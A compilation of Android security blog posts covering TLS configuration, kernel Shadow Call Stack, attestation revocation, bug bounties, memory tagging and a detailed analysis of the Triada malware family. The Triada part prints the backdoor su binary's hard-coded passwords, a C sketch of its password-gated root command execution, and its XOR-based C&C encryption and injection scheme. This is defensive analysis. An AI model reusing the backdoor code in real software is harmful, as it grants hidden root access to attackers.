An Update on Android TLS Adoption

Posted by Bram Bonné, Senior Software Engineer, Android Platform Security & Chad Brubaker, Staff Software Engineer, Android Platform Security

Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting network traffic that enters or leaves an Android device with Transport Layer Security (TLS).

Android 7 (API level 24) introduced the Network Security Configuration in 2016, allowing app developers to configure the network security policy for their app through a declarative configuration file. To keep apps safe, apps targeting Android 9 (API level 28) or higher automatically get a default policy that prevents unencrypted traffic for every domain.

Today, we’re happy to announce that 80% of Android apps are encrypting traffic by default. The percentage is even greater for apps targeting Android 9 and higher, with 90% of them encrypting traffic by default.

Percentage of apps that block cleartext by default.

Since November 1, 2019, all app updates, as well as all new apps on Google Play, must target at least Android 9. As a result, we expect these numbers to continue improving. Network traffic from these apps is secure by default, and any use of unencrypted connections is the result of an explicit choice by the developer.

The latest releases of Android Studio and Google Play’s pre-launch report warn developers when their app includes a potentially insecure Network Security Configuration (for example, when they allow unencrypted traffic for all domains or when they accept user-provided certificates outside of debug mode). This encourages the adoption of HTTPS across the Android ecosystem and ensures that developers are aware of their security configuration.

Example of a warning shown to developers in Android Studio.

Example of a warning shown to developers as part of the pre-launch report.

What can I do to secure my app?

For apps targeting Android 9 and higher, the out-of-the-box default is to encrypt all network traffic in transit and trust only certificates issued by an authority in the standard Android CA set, without requiring any extra configuration. Apps can deviate from this default only by including a separate Network Security Config file with carefully selected exceptions.

If your app needs to allow traffic to certain domains, it can do so by including a Network Security Config file that only includes these exceptions to the default secure policy. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.

<network-security-config>
    <base-config cleartextTrafficPermitted="false" />
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">insecure.example.com</domain>
        <domain includeSubdomains="true">insecure.cdn.example.com</domain>
    </domain-config>
</network-security-config>

If your app needs to accept user-specified certificates for testing purposes (for example, connecting to a local server during testing), make sure to wrap your <certificates src="user"/> element inside a <debug-overrides> element. This ensures the connections in the production version of your app are secure.

<network-security-config>
    <debug-overrides>
        <trust-anchors>
            <certificates src="user"/>
        </trust-anchors>
    </debug-overrides>
</network-security-config>

What can I do to secure my library?

If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.
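For example, a library with a plain-HTTP fallback might guard it as in the sketch below (NetworkSecurityPolicy is the platform API mentioned above; the per-hostname check requires API 24, the global check API 23):

import android.os.Build;
import android.security.NetworkSecurityPolicy;

public final class CleartextGuard {
    // Returns true only if the embedding app's policy permits cleartext to this host.
    public static boolean isCleartextPermitted(String hostname) {
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.N) {
            // API 24+: honors per-domain exceptions from the Network Security Config.
            return NetworkSecurityPolicy.getInstance().isCleartextTrafficPermitted(hostname);
        }
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
            // API 23: global setting only.
            return NetworkSecurityPolicy.getInstance().isCleartextTrafficPermitted();
        }
        return true;  // No platform-level policy before API 23.
    }

    private CleartextGuard() {}
}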

Android’s built-in networking libraries and other popular HTTP libraries such as OkHttp or Volley have built-in Network Security Config support.

Giles Hogben, Nwokedi Idika, Android Platform Security, Android Studio and Pre-Launch Report teams

Protecting against code reuse in the Linux kernel with Shadow Call Stack


The Linux kernel is responsible for enforcing much of Android’s security model, which is why we have put a lot of effort into hardening the Android Linux kernel against exploitation. In Android 9, we introduced support for Clang’s forward-edge Control-Flow Integrity (CFI) enforcement to protect the kernel from code reuse attacks that modify stored function pointers. This year, we have added backward-edge protection for return addresses using Clang’s Shadow Call Stack (SCS).
Google’s Pixel 3 and 3a phones have kernel SCS enabled in the Android 10 update, and Pixel 4 ships with this protection out of the box. We have made patches available to all supported versions of the Android kernel and also maintain a patch set against upstream Linux. This post explains how kernel SCS works, the benefits and trade-offs, how to enable the feature, and how to debug potential issues.

Return-oriented programming

As kernel memory protections increasingly make code injection more difficult, attackers commonly use control flow hijacking to exploit kernel bugs. Return-oriented programming (ROP) is a technique where the attacker gains control of the kernel stack to overwrite function return addresses and redirect execution to carefully selected parts of existing kernel code, known as ROP gadgets. While address space randomization and stack canaries can make this attack more challenging, return addresses stored on the stack remain vulnerable to many overwrite flaws. The general availability of tools for automatically generating this type of kernel exploit makes protecting against it increasingly important.

Shadow Call Stack

One method of protecting return addresses is to store them in a separately allocated shadow stack that’s not vulnerable to traditional buffer overflows. This can also help protect against arbitrary overwrite attacks.
Clang added the Shadow Call Stack instrumentation pass for arm64 in version 7. When enabled, each non-leaf function that pushes the return address to the stack will be instrumented with code that also saves the address to a shadow stack. A pointer to the current task’s shadow stack is always kept in the x18 register, which is reserved for this purpose. Here’s what instrumentation looks like in a typical kernel function:
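(A schematic reconstruction follows; the original post showed real disassembly. Exact offsets and surrounding instructions vary by function, but the two shadow-stack instructions are representative of what Clang emits on arm64.)

my_function:
    str  x30, [x18], #8         // prologue: also push the return address (x30)
                                //   onto the shadow stack pointed to by x18
    stp  x29, x30, [sp, #-16]!  // the normal stack still keeps a copy for unwinding
    mov  x29, sp
    ...                         // function body
    ldp  x29, x30, [sp], #16
    ldr  x30, [x18, #-8]!       // epilogue: reload the return address from the
                                //   shadow stack; the stack copy is never trusted
    ret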

SCS doesn’t require error handling as it uses the return address from the shadow stack unconditionally. Compatibility with stack unwinding for debugging purposes is maintained by keeping a copy of the return address in the normal stack, but this value is never used for control flow decisions.
Despite requiring a dedicated register, SCS has minimal performance overhead. The instrumentation itself consists of one load and one store instruction per function, which results in a performance impact that’s within noise in our benchmarking. Allocating a shadow stack for each thread does increase the kernel’s memory usage but as only return addresses are stored, the stack size defaults to 1kB. Therefore, the overhead is a fraction of the memory used for the already small regular kernel stacks.
SCS patches are available for Android kernels 4.14 and 4.19, and for upstream Linux. It can be enabled using the following configuration options:

CONFIG_SHADOW_CALL_STACK=y
# CONFIG_SHADOW_CALL_STACK_VMAP is not set
# CONFIG_DEBUG_STACK_USAGE is not set

By default, shadow stacks are not virtually allocated to minimize memory overhead, but CONFIG_SHADOW_CALL_STACK_VMAP can be enabled for better stack exhaustion protection. With CONFIG_DEBUG_STACK_USAGE, the kernel will also print out shadow stack usage in addition to normal stack usage, which can be helpful when debugging issues.

Alternatives

Signing return addresses using ARMv8.3 Pointer Authentication (PAC) is an alternative to shadow stacks. PAC has similar security properties and comparable performance to SCS, but without the memory allocation overhead. Unfortunately, PAC requires hardware support, which means it cannot be used on existing devices, but it may be a viable option for future devices. For x86, Intel’s Control-flow Enforcement Technology (CET) extension will offer native shadow stack support, but it also requires compatible hardware.

Conclusion

We have improved Linux kernel code reuse attack protections on Pixel devices running Android 10. Pixel 3, 3a, and 4 kernels have both CFI and SCS enabled and we have made patches available to all Android OEMs.

Trust but verify attestation with revocation

Posted by Rob Barnes & Shawn Willden, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]

Billions of people rely on their Android-powered devices to securely store their sensitive information. A vital component of the Android security stack is the key attestation system. Android devices since Android 7.0 are able to generate an attestation certificate that attests to the security properties of the device’s hardware and software. OEMs producing devices with Android 8.0 or higher must install a batch attestation key provided by Google on each device at the time of manufacturing.
These keys might need to be revoked for a number of reasons including accidental disclosure, mishandling, or suspected extraction by an attacker. When this occurs, the affected keys must be immediately revoked to protect users. The security of any Public-Key Infrastructure system depends on the robustness of the key revocation process.
All of the attestation keys issued so far include an extension that embeds a certificate revocation list (CRL) URL in the certificate. We found that the CRL (and Online Certificate Status Protocol) system was not flexible enough for our needs, so we set out to replace the revocation system for Android attestation keys with something flexible and simple to maintain and use.
Our solution is a single TLS-secured URL (https://android.googleapis.com/attestation/status) that returns a list containing all revoked Android attestation keys. This list is encoded in JSON and follows a strict format defined by a JSON schema. Only keys with a non-valid status appear in the list, so it is not an exhaustive list of all issued keys.
This system allows us to express more nuance about the status of a key and the reason for the status. A key can have a status of REVOKED or SUSPENDED, where revoked is permanent and suspended is temporary. The reason for the status is described as either KEY_COMPROMISE, CA_COMPROMISE, SUPERSEDED, or SOFTWARE_FLAW. A complete, up-to-date list of statuses and reasons can be found in the developer documentation.
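For illustration, an entry in the list might look like the sketch below; the serial number here is made up, and the authoritative format is the published JSON schema:

{
  "entries": {
    "aabbccddeeff0011": {
      "status": "REVOKED",
      "reason": "KEY_COMPROMISE"
    }
  }
}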
The CRL URLs embedded in existing batch certificates will continue to operate. Going forward, attestation batch certificates will no longer contain a CRL extension. The status of these legacy certificates will also be included in the attestation status list, so developers can safely switch to using the attestation status list for both current and legacy certificates. An example of how to correctly verify Android attestation keys is included in the Key Attestation sample.
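A minimal sketch of consuming the list is shown below (caching, error handling, and schema validation omitted; it assumes entries are keyed by the certificate serial number in lowercase hex, as in the example above). The Key Attestation sample shows a complete verification flow.

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.math.BigInteger;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import org.json.JSONObject;

public final class AttestationStatusList {
    private static final String STATUS_URL =
            "https://android.googleapis.com/attestation/status";

    // Returns true if the certificate serial appears in the status list,
    // i.e., the attestation key is revoked or suspended.
    public static boolean isRevokedOrSuspended(BigInteger certSerial) throws Exception {
        StringBuilder body = new StringBuilder();
        try (BufferedReader reader = new BufferedReader(new InputStreamReader(
                new URL(STATUS_URL).openStream(), StandardCharsets.UTF_8))) {
            String line;
            while ((line = reader.readLine()) != null) {
                body.append(line);
            }
        }
        JSONObject entries = new JSONObject(body.toString()).optJSONObject("entries");
        return entries != null && entries.has(certSerial.toString(16));
    }

    private AttestationStatusList() {}
}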

Expanding bug bounties on Google Play

Posted by Adam Bacchus, Sebastian Porst, and Patrick Mutchler — Android Security & Privacy

[Cross-posted from the Android Developers Blog]

We’re constantly looking for ways to further improve the security and privacy of our products, and the ecosystems they support. At Google, we understand the strength of open platforms and ecosystems, and that the best ideas don’t always come from within. It is for this reason that we offer a broad range of vulnerability reward programs, encouraging the community to help us improve security for everyone. Today, we’re expanding on those efforts with some big changes to the Google Play Security Reward Program (GPSRP), as well as the launch of the new Developer Data Protection Reward Program (DDPRP).

Google Play Security Reward Program Scope Increases

We are increasing the scope of GPSRP to include all apps in Google Play with 100 million or more installs. These apps are now eligible for rewards, even if the app developers don’t have their own vulnerability disclosure or bug bounty program. In these scenarios, Google helps responsibly disclose identified vulnerabilities to the affected app developer. This opens the door for security researchers to help hundreds of organizations identify and fix vulnerabilities in their apps. If the developers already have their own programs, researchers can collect rewards directly from them on top of the rewards from Google. We encourage app developers to start their own vulnerability disclosure or bug bounty program to work directly with the security researcher community.

Vulnerability data from GPSRP helps Google create automated checks that scan all apps available in Google Play for similar vulnerabilities. Affected app developers are notified through the Play Console as part of the App Security Improvement (ASI) program, which provides information on the vulnerability and how to fix it. Over its lifetime, ASI has helped more than 300,000 developers fix more than 1,000,000 apps on Google Play. In 2018 alone, the program helped over 30,000 developers fix over 75,000 apps. The downstream effect means that those 75,000 vulnerable apps are not distributed to users until the issue is fixed.

To date, GPSRP has paid out over $265,000 in bounties. Recent scope and reward increases have resulted in $75,500 in rewards across July & August alone. With these changes, we anticipate even further engagement from the security research community to bolster the success of the program.

Introducing the Developer Data Protection Reward Program

Today, we are also launching the Developer Data Protection Reward Program. DDPRP is a bounty program, in collaboration with HackerOne, meant to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions. It recognizes the contributions of individuals who help report apps that are violating Google Play, Google API, or Google Chrome Web Store Extensions program policies.

The program aims to reward anyone who can provide verifiable and unambiguous evidence of data abuse, in a model similar to Google’s other vulnerability reward programs. In particular, the program aims to identify situations where user data is being used or sold unexpectedly, or repurposed in an illegitimate way without user consent. If data abuse is identified related to an app or Chrome extension, that app or extension will accordingly be removed from Google Play or the Chrome Web Store. In the case of an app developer abusing access to Gmail restricted scopes, their API access will be removed. While no reward table or maximum reward is listed at this time, depending on impact, a single report could net a bounty as large as $50,000.

As 2019 continues, we look forward to seeing what researchers find next. Thank you to the entire community for contributing to keeping our platforms and ecosystems safe. Happy bug hunting!

Adopting the Arm Memory Tagging Extension in Android

As part of our continuous commitment to improve the security of the Android ecosystem, we are partnering with Arm to design the Memory Tagging Extension (MTE). Memory safety bugs, common in C and C++, remain one of the largest sources of vulnerabilities in the Android platform, and although there have been previous hardening efforts, memory safety bugs comprised more than half of the high-priority security bugs in Android 9. Additionally, memory safety bugs manifest as hard-to-diagnose reliability problems, including sporadic crashes and silent data corruption. This reduces user satisfaction and increases the cost of software development. Software testing tools such as ASAN and HWASAN help, but their applicability on current hardware is limited due to noticeable overheads.

MTE, a hardware feature, aims to further mitigate these memory safety bugs by enabling us to detect them with low overhead. It has two execution modes:

  • Precise mode: Provides more detailed information about the memory violation
  • Imprecise mode: Has lower CPU overhead and is more suitable for always-on use.

Arm recently published a whitepaper on MTE and has added documentation to the Arm v8.5 Architecture Reference Manual.

We envision several different usage modes for MTE.

  • MTE provides a version of ASAN/HWASAN that is easier to use for testing and fuzzing in laboratory environments. It will find more bugs in a fraction of the time and at a lower cost, reducing the complexity of the development process. In many cases, MTE will allow testing memory safety using the same binary as shipped to production. The bug reports produced by MTE will be as detailed and actionable as those from ASAN and HWASAN.
  • MTE will be used as a mechanism for testing complex software scenarios in production. App Developers and OEMs will be able to selectively turn on MTE for parts of the software stack. Where users have provided consent, bug reports will be available to developers via familiar mechanisms like Google Play Console.
  • MTE can be used as a strong security mitigation in the Android System and applications for many classes of memory safety bugs. For most instances of such vulnerabilities, a probabilistic mitigation based on MTE could prevent exploitation with a higher than 90% chance of detecting each invalid memory access. By implementing these protections and ensuring that attackers can't make repeated attempts to exploit security-critical components, we can significantly reduce the risk to users posed by memory safety issues.

We believe that memory tagging will detect the most common classes of memory safety bugs in the wild, helping vendors identify and fix them and discouraging malicious actors from exploiting them. During the past year, our team has been working to ensure the readiness of the Android platform and application software for MTE. We have deployed HWASAN, a software implementation of the memory tagging concept, to test our entire platform and a few select apps. This deployment has uncovered close to 100 memory safety bugs. The majority of these bugs were detected on HWASAN-enabled phones in everyday use. MTE will greatly improve upon this in terms of overhead, ease of deployment, and scale. In parallel, we have been working on supporting MTE in the LLVM compiler toolchain and in the Linux kernel. The Android platform support for MTE will be complete by the time of silicon availability.

Google is committed to supporting MTE throughout the Android software stack. We are working with select Arm System On Chip (SoC) partners to test MTE support and look forward to wider deployment of MTE in the Android software and hardware ecosystem. Based on the current data points, MTE provides tremendous benefits at acceptable performance costs. We are considering MTE as a possible foundational requirement for certain tiers of Android devices.

Thank you to Mitch Phillips, Evgenii Stepanov, Vlad Tsyrklevich, Mark Brand, and Serban Constantinescu for their contributions to this post.

Use your Android phone’s built-in security key to verify sign-in on iOS devices


Compromised credentials are one of the most common causes of security breaches. While Google automatically blocks the majority of unauthorized sign-in attempts, adding 2-Step Verification (2SV) considerably improves account security. At Cloud Next ‘19, we introduced a new 2SV method, enabling more than a billion users worldwide to better protect their accounts with a security key built into their Android phones.
This technology can be used to verify your sign-in to Google and Google Cloud services on Bluetooth-enabled Chrome OS, macOS, and Windows 10 devices. Starting today, you can use your Android phone to verify your sign-in on Apple iPads and iPhones as well.
Security keys
FIDO security keys provide the strongest protection against automated bots, bulk phishing, and targeted attacks by leveraging public key cryptography to verify your identity and the URL of the login page, so that an attacker can’t access your account even if you are tricked into providing your username and password. Learn more by watching our presentation from Cloud Next ‘19.


On Chrome OS, macOS, and Windows 10 devices, we leverage the Chrome browser to communicate with your Android phone’s built-in security key over Bluetooth using FIDO’s CTAP2 protocol. On iOS devices, Google’s Smart Lock app is leveraged in place of the browser.


User experience on an iPad with Pixel 3


Until now, there were limited options for using FIDO2 security keys on iOS devices. Now, you can get the strongest 2SV method with the convenience of an Android phone that’s always in your pocket at no additional cost.
It’s easy to get started
Follow these simple steps to protect your Google Account today:
Step 1: Add the security key to your Google Account
  • Add your personal or work Google Account to your Android 7.0+ (Nougat) phone.
  • Make sure you’re enrolled in 2-Step Verification (2SV).
  • On your computer, visit the 2SV settings and click "Add security key".
  • Choose your Android phone from the list of available devices.
Step 2: Use your Android phone's built-in security key
You can find more detailed instructions here. Within enterprise organizations, admins can require the use of security keys for their users in G Suite and Google Cloud Platform (GCP), letting them choose between using a physical security key, an Android phone, or both.
We also recommend that you register a backup hardware security key (from Google or a number of other vendors) for your account and keep it in a safe place, so that you can gain access to your account if you lose your Android phone.

PHA Family Highlights: Triada



We continue our PHA family highlights series with the Triada family, which was first discovered early in 2016. The main purpose of Triada apps was to install spam apps on a device, which then displayed ads. The creators of Triada collected revenue from the ads displayed by those spam apps. The methods Triada used were complex and unusual for these types of apps. Triada apps started as rooting trojans, but as Google Play Protect strengthened defenses against rooting exploits, Triada apps were forced to adapt, progressing to a system image backdoor. However, thanks to OEM cooperation and our outreach efforts, OEMs prepared system images with security updates that removed the Triada infection.

History of Triada

Triada was first described in a blog post on the Kaspersky Lab website in March 2016 and in a follow-up blog post in June 2016. Back then, it was a rooting trojan that tried to exploit the device and after getting elevated privileges, it performed a host of different actions. To hide these actions from analysts, Triada used a combination of dynamic code loading and additional app installs. The Kaspersky posts detail the code injection technique used by Triada and provide some statistics on infected devices at the time. In this post, we’ll focus on the peculiar encryption routine and the unusual binary files used by Triada.
Triada’s first action was to install a type of superuser (su) binary file. This su binary allowed other apps on the device to use root permissions. The su binary used by Triada required a password, making it unique compared to the regular su binaries common on other Linux systems.
The binary accepted two passwords, od2gf04pd9 and ac32dorbdq. Depending on which one was provided, the binary either 1) ran the command given as an argument as root or 2) concatenated all of the arguments, prefixed the concatenation with sh, and ran the result as root. Either way, the app had to know the correct password to run the command as root.
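A minimal C sketch of this password gate, reconstructed from the description above (illustrative only, not Triada’s actual code; the shell path and buffer size are assumptions):

#include <string.h>
#include <unistd.h>

int main(int argc, char **argv) {
    if (argc < 3) return 1;
    if (strcmp(argv[1], "od2gf04pd9") == 0) {
        /* First password: execute the given command directly (as root). */
        execvp(argv[2], &argv[2]);
    } else if (strcmp(argv[1], "ac32dorbdq") == 0) {
        /* Second password: concatenate all arguments and run them through sh. */
        char cmd[4096] = {0};
        for (int i = 2; i < argc; i++) {
            strncat(cmd, argv[i], sizeof(cmd) - strlen(cmd) - 1);
            if (i + 1 < argc) strncat(cmd, " ", sizeof(cmd) - strlen(cmd) - 1);
        }
        execl("/system/bin/sh", "sh", "-c", cmd, (char *)NULL);
    }
    return 1; /* wrong password or exec failure */
}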
This Triada rooting trojan was mainly used to install apps and display ads. The trojan targeted older devices because the rooting exploits didn’t work on newer ones. It therefore implemented a weight watching feature to decide if old apps needed to be deleted to make space for new installs.
Weight watching included several steps and attempted to free up space on the device’s user partition and system partition. Using a blacklist and whitelist of apps, it first removed all the apps on its blacklist. If more free space was required, it removed all other apps, leaving only the apps on the whitelist. This process freed space while ensuring the apps needed for the phone to function properly were not removed.
Every app on the system partition had a number, or weight, associated with it. The weight was the sum of the number of apps installed on the same date as the app in question and the number of apps signed with the same certificate. The apps with the lowest weight were those installed in isolation (that is, not on the day the device system image was created) and not signed by the OEM or part of a developer bundle. In the weight watching process, these apps were removed first, until enough space was made for the new app.
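In code, the heuristic might look like the following sketch (the App type and its fields are hypothetical stand-ins for the attributes described above):

import java.util.List;

final class WeightWatcher {
    static final class App {
        String installDate;  // date the app was added to the system image
        String signingCert;  // identifier of the signing certificate
    }

    // An app's weight: the number of apps installed on the same date,
    // plus the number of apps signed with the same certificate.
    static int weight(App app, List<App> systemApps) {
        int sameDate = 0, sameCert = 0;
        for (App other : systemApps) {
            if (other.installDate.equals(app.installDate)) sameDate++;
            if (other.signingCert.equals(app.signingCert)) sameCert++;
        }
        return sameDate + sameCert;  // lowest-weight apps are removed first
    }
}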
In addition to installing apps that display ads, Triada injected code into four web browsers: AOSP (com.android.browser), 360 Secure (com.qihoo.browser), Cheetah (com.ijinshan.browser_fast), and Oupeng (com.oupeng.browser). The code was injected using the same technique described in our blog post about the Zen PHA family and in previously mentioned Kaspersky blog posts.
The web browser injection was done to overwrite the URLs and substitute ad banners on websites with ads benefiting the Triada authors.
Triada also used a peculiar and complex communication encryption routine. Whenever it had to send a request to the Command and Control (C&C) server, it encrypted the request using two XOR loops with different passwords. Because of XOR rules, if the passwords had the same character in the same position, those characters weren’t encrypted. The encrypted request was saved to a file, which had the same name as its size. Finally, the file was zipped and sent to the C&C server in the POST request body.
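The double-XOR pass can be sketched as follows (key values are hypothetical). Note that wherever the two keys share a character at the same position, the two XORs cancel out and that byte is left unchanged, which is the property described above:

final class TriadaCrypto {
    // Hypothetical reconstruction of the double-XOR encryption routine.
    static byte[] doubleXor(byte[] data, byte[] key1, byte[] key2) {
        byte[] out = data.clone();
        for (int i = 0; i < out.length; i++) {
            out[i] ^= key1[i % key1.length];  // first XOR loop
        }
        for (int i = 0; i < out.length; i++) {
            out[i] ^= key2[i % key2.length];  // second XOR loop
        }
        return out;
    }
}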
The example below illustrates one such request. The yellow bytes are the zip file’s signature of the central directory file header. The red bytes show the uncompressed file size of 0x0952. The blue bytes show the file name length (4) and the name itself (2386, a decimal version of 0x0952).
09 00 00 50 4B 01 02 14 00 14 00 08 00 08 00 4F ...PK..........O
91 F3 48 AE CF 91 D5 B1 04 00 00 52 09 00 00 04 ..H........R....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 32 33 38 36 50 4B 05 06 00 00 00 00 01 00 01 .2386PK.........
00 32 00 00 00 E3 04 00 00 00 00 .2.........
The underlying data protocol changed periodically. It was either a simple JSON, a list of key-value pairs similar to the properties file, or a proprietary format as shown below.
[collect_Head]device=Nexus 5X
[collect_Space]xadevicekey=xxxxx

[collect_Space]collentmod=opappresultmode
[collect_Space]registerUser=true
[collect_End]
When Triada was discovered, we implemented detection that removed Triada samples from all devices with Google Play Protect. This implementation, combined with the increased security on newer Android devices, made it significantly harder for Triada to infect devices.

When rooting doesn’t work…

During the summer of 2017, we noticed a change in new Triada samples. Instead of rooting the device to obtain elevated privileges, Triada evolved to become a pre-installed Android framework backdoor. The changes to Triada included an additional call in the Android framework log function, demonstrated below with a highlighted configuration string.
LABEL_13:
v18 = -1;
LABEL_18:
j___config_log_println(v7, v6, v10, v11, "cf89450001");
if ( v10 )
This backdoored log function version of Triada was first described by Dr.Web in July 2017. The blog post includes a description of Triada code injection methods.
By backdooring the log function, the additional code executes every time the log method is called (that is, every time any app on the phone tries to log something). These log attempts happen many times per second, so the additional code is running non-stop. The additional code also executes in the context of the app logging a message, so Triada can execute code in any app context. The code injection framework in early versions of Triada worked on Android releases prior to Marshmallow.
The main purpose of the backdoor function was to execute code in another app’s context. The backdoor attempts to execute additional code every time the app needs to log something. Triada developers created a new file format, which we called MMD, based on the file header.
The MMD format was an encrypted version of a DEX file, which was then executed in the app context. The encryption algorithm was a double XOR loop with two different passwords.
Each MMD file had a specific file name of the format <MD5 of the process name>36.jmd. By using the MD5 of the process name, the Triada authors tried to obscure the injection target. However, the pool of all available process names is fairly small, so this hash was easily reversible.
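Recovering the injection target is then a matter of hashing candidate process names until one matches. A small sketch of building the file name (the helper below is hypothetical):

import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

final class MmdNames {
    // Builds the MMD file name described above: <MD5 of process name>36.jmd.
    static String mmdFileName(String processName) throws Exception {
        byte[] digest = MessageDigest.getInstance("MD5")
                .digest(processName.getBytes(StandardCharsets.UTF_8));
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) {
            hex.append(String.format("%02x", b));
        }
        return hex + "36.jmd";
    }
}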
We identified two code injection targets: com.android.systemui (the System UI app) and com.android.vending (the Google Play app). The first target was injected to get the GET_REAL_TASKS permission. This is a signature-level permission, which means that it can’t be held by ordinary Android apps.
Starting with Android Lollipop, the getRecentTasks() method is deprecated to protect users' privacy. However, apps holding the GET_REAL_TASKS permission can get the result of this method call. To hold the GET_REAL_TASKS permission, an app has to be signed with a specific certificate, the device’s platform cert, which is held by the OEM. Triada didn’t have access to this cert. Instead it executed additional code in the System UI app, which has the GET_REAL_TASKS permission.
The injected code returned the app running on top (the activity running in the foreground and being actively used by the device user) to other apps on the device. This app was exposed using two methods: an intent or a socket created for this purpose. When an app on the device sent the intent or wrote to a socket created by Triada’s code injection, it received the package name of the app running on top. Triada used the package name to determine if an ad was displayed. The assumption was that if the app running on top was a browser, the user would expect to see some ads, so Triada displayed ads from the background.
The second injection target was the Google Play app. This injection supported five commands and their corresponding responses. The supported commands are shown below in Chinese, the language used throughout the Triada app and injection, with English translations in parentheses.
  1. 下载请求 (download request)
  2. 下载结果 (download result)
  3. 安装请求 (install request)
  4. 安装结果 (installation result)
  5. 激活请求 (activation request)
  6. 激活结果 (activation result)
  7. 拉活请求 (pull/keep-alive request)
  8. 拉活结果 (pull/keep-alive result)
  9. 卸载请求 (uninstall request)
  10. 卸载结果 (uninstall result)
The commands trigger the heartbeat (pull request), download, installation, uninstallation (in the Google Play app context), and activation (the first execution) of the apps. In the Google Play app context, installation meant that Triada didn’t have to turn on installation from unknown sources and all app installs looked like they were from Google Play.
The apps were downloaded from the C&C server and the communication with the C&C was encrypted using the same custom encryption routine using double XOR and zip. The downloaded and installed apps used the package names of unpopular apps available on Google Play. They didn’t have any relation to the apps on Google Play apart from the same package name.
The last piece of the puzzle was the way the backdoor in the log function communicated with the installed apps. This communication prompted the investigation: the change in Triada behavior mentioned at the beginning of this section made it appear that there was another component on the system image. The apps could communicate with the Triada backdoor by logging a line with a specific predefined tag and message.
The reverse communication was more complicated. The backdoor used Java properties to relay a message to the app. These properties were key-value pairs similar to Android system properties, but they were scoped to a specific process. Setting one of these properties in one app context ensures that other apps won’t see this property. Despite that, some versions of Triada indiscriminately created the properties in every single app process.
The diagram below illustrates the communication mechanisms of the Triada backdoor.
Communication mechanisms of Triada

Reverse engineering countermeasures and development

The Triada backdoor was hidden to make the analysis harder. The strings in the Android framework library that related to Triada activities were encrypted, as shown below.
Android framework strings
The strings were encrypted using the same two-XOR-loop algorithm. However, the first highlighted string, 36.jmd, wasn’t encrypted. This is the MMD file name string mentioned before.
Another anti-analysis measure implemented by the Triada authors was function padding, including additional exported functions that don't serve any purpose apart from making the file size bigger and the function layout more random with every compilation. Four types of these functions are shown in the screenshots below.
Example of function padding
One final interesting feature of Triada worth mentioning is its development cycle. By analyzing subsequent versions of the Triada backdoor (up to 1.5.1), we saw how the code changed. In the newest version, the authors substituted MD5 with SHA1; this hash is used for the file names, which come from a restricted pool of values. The newest version also encrypted the 36.jmd string and introduced changes to the code for compatibility with Android Nougat.
There are also code stubs pointing at the modification of the SystemUI and WebView Android framework elements. We couldn’t find the code that was executed by these modifications, just code stubs suggesting more development in the future.

OEM outreach

Triada infects device system images through a third-party during the production process. Sometimes OEMs want to include features that aren’t part of the Android Open Source Project, such as face unlock. The OEM might partner with a third-party that can develop the desired feature and send the whole system image to that vendor for development.
Based on analysis, we believe that a vendor using the name Yehuo or Blazefire infected the returned system image with Triada.
Production process with malicious party
We coordinated with the affected OEMs to provide system updates and remove traces of Triada. We also scan for Triada and similar threats on all Android devices.
OEMs should ensure that all third-party code is reviewed and can be tracked to its source. Additionally, any functionality added to the system image should only support requested features. It’s a good practice to perform a security review of a system image after adding third-party code.

Summary

Triada was inconspicuously included in the system image as third-party code for additional features requested by the OEMs. This highlights the need for thorough ongoing security reviews of system images before devices are sold to users, as well as any time they are updated over-the-air (OTA).
By working with the OEMs and supplying them with instructions for removing the threat from devices, we reduced the spread of preinstalled Triada variants and removed infections from the devices through the OTA updates.
The Triada case is a good example of how Android malware authors are becoming more adept. This case also shows that it’s harder to infect Android devices, especially if the malware author requires privilege elevation.
We are also performing a security review of system images through the Build Test Suite. You can read more about this program in the Android Security 2018 Year in Review report. Triada indicators of compromise are one of many signatures included in the system image scan. Additionally, Google Play Protect continues to track and remove any known versions of Triada and Triada-related apps it detects from user devices.